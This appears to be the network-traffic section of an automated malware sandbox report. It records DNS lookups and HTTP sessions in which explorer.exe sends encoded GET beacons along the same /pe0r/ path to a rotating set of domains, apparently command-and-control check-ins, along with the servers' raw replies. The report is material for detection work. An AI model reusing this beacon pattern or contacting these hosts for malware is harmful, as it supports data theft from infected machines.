                                                                      Apr 8, 2021 13:23:00.417926073 CEST8.8.8.8192.168.2.40xa297No error (0)www.desertfoxindustries.comdesertfoxindustries.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:23:00.417926073 CEST8.8.8.8192.168.2.40xa297No error (0)desertfoxindustries.com184.168.131.241A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:06.521147013 CEST8.8.8.8192.168.2.40x7cc0No error (0)www.tennesseewheelrepair.comtennesseewheelrepair.comCNAME (Canonical name)IN (0x0001)
                                                                      Apr 8, 2021 13:23:06.521147013 CEST8.8.8.8192.168.2.40x7cc0No error (0)tennesseewheelrepair.com184.168.131.241A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.36.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.32.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.34.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:11.993323088 CEST8.8.8.8192.168.2.40xd53No error (0)www.rootedwithlovejax.com216.239.38.21A (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:22.195578098 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:23.204312086 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:24.221883059 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:26.237104893 CEST8.8.8.8192.168.2.40xefccServer failure (2)www.coloradocouponclub.comnonenoneA (IP address)IN (0x0001)
                                                                      Apr 8, 2021 13:23:27.627649069 CEST8.8.8.8192.168.2.40xa670Server failure (2)www.lideresdeimmunocal.comnonenoneA (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.1364kensington.com
                                                                      • www.luegomusic.com
                                                                      • www.kf350.com
                                                                      • www.pierresplayhouse.com
                                                                      • www.thecapitalhut.com
                                                                      • www.ssfgasia.com
                                                                      • www.desertfoxindustries.com
                                                                      • www.tennesseewheelrepair.com
                                                                      • www.rootedwithlovejax.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.44975166.96.161.16080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:07.319251060 CEST1216OUTGET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.1364kensington.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:07.443166971 CEST1217INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 08 Apr 2021 11:22:07 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449764162.241.244.6180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:17.851991892 CEST2104OUTGET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.luegomusic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:18.669209003 CEST2105INHTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:17 GMT
                                                                      Server: Apache
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Location: http://luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0
                                                                      host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                      X-Endurance-Cache-Level: 0
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.449770107.178.142.15680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:23.881720066 CEST2159OUTGET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.kf350.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:27.418097019 CEST6582INHTTP/1.1 200 OK
                                                                      Date: Thu, 08 Apr 2021 11:22:35 GMT
                                                                      Content-Length: 331
                                                                      Content-Type: text/html
                                                                      Server: Microsoft-IIS/7.5
                                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b9 d9 cd f8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449771199.59.242.15380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:44.892147064 CEST6584OUTGET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.pierresplayhouse.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:45.002899885 CEST6585INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ==
                                                                      Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 76 46 4f 2b 51 61 30 52 30 6d 6f 77 4a 61 73 4c 51 54 53 6e 52 76 57 61 47 55 69 43 38 54 67 52 52 35 62 74 38 56 30 33 74 6c 41 31 6f 30 55 76 2f 5a 6e 76 77 4b 37 31 47 78 39 39 69 52 44 7a 33 6a 45 65 77 63 47 45 48 51 51 74 4a 43 41 4a 61 68 4d 66 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                      Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                      Apr 8, 2021 13:22:45.002926111 CEST6587INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                      Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                      Apr 8, 2021 13:22:45.002974033 CEST6588INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                      Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
                                                                      Apr 8, 2021 13:22:45.002993107 CEST6588INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                      Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                      Apr 8, 2021 13:22:45.003007889 CEST6589INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                      Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.44977235.246.6.10980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:50.107975006 CEST6590OUTGET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.thecapitalhut.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:50.173912048 CEST6591INHTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:50 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      location: https://www.thecapitalhut.com/pe0r?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0
                                                                      strict-transport-security: max-age=120
                                                                      x-wix-request-id: 1617880970.125913965966121268
                                                                      Age: 0
                                                                      Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                      X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgmNySqidgeEPHXBvm3U9iS,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRalh3hwieZdjPl8CZNSQhfEynGR4aF8yrGttME1Z/doJQd3fKEXQvQlSAkB/lstal9R73i9xLAFDBM1sgnz44DHz8=,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,sqmudy1rWy5CXemzdhzS/IdY/BHPTlKnJIetyMef762TzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,k4IrXgMmYJ2VF1cp9wAw75WSI3OLjEFdjvyrPhumLIdLrTe66AYUmhbsk95nB1oVKjCWKapddFlOEEDxcGowaw==
                                                                      Cache-Control: no-cache
                                                                      Server: Pepyaka/1.19.0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.44977434.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:55.232578993 CEST6600OUTGET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.ssfgasia.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:55.347368956 CEST6601INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "6061898c-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449776184.168.131.24180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:23:00.599381924 CEST6612OUTGET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.desertfoxindustries.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:00.805794001 CEST6612INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: http://www.etsy.com/shop/DesertFoxIndustries?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.449777184.168.131.24180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:23:06.701818943 CEST6613OUTGET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.tennesseewheelrepair.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:06.904542923 CEST6613INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:06 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: https://musiccityrecon.com/wheel-repair.htm?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.449778216.239.36.2180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:23:12.007415056 CEST6616OUTGET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.rootedwithlovejax.com
